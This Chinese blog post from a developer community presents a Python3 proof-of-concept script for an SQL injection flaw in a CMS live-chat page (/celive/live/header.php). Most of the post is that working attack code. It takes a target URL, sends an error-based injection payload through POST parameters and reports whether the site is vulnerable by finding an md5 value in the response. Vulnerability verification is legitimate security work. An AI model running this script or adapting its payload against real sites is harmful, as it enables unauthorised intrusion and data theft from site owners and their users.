前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Python3实现PoC——wooyun

Python3实现PoC——wooyun

作者头像
py3study
发布2020-01-03 11:02:48
5640
发布2020-01-03 11:02:48
举报
文章被收录于专栏:python3python3

一、演示一下的利用效果

wKiom1hWiDzgtRddAAEafL05SRs942.png
wKiom1hWiDzgtRddAAEafL05SRs942.png

二、漏洞说明

这次的PoC是验证SQL注入,漏洞详情

三、代码+注释

代码语言:javascript
复制
import requests
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('-u', dest="url")
args = parser.parse_args()
url = args.url

# 存在漏洞的页面
url += "/celive/live/header.php"
# 构造payload,用md5结果来验证
payload = {
    'xajax': 'LiveMessage',
    'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),"
                          "concat(floor(rand(0)*2),(select md5(888)))a"
                          " from information_schema.tables group by a)b)"
                          ",'','','','1','127.0.0.1','2') #"
}

try:
    r = requests.post(url, data=payload)
    if(r.status_code == requests.codes.ok):
        if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:
            print("{} is SQL_vul".format(url))
        else:
            print("{} is not SQL_vul".format(url))
except Exception as e:
    print(str(e))
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2019-09-26 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档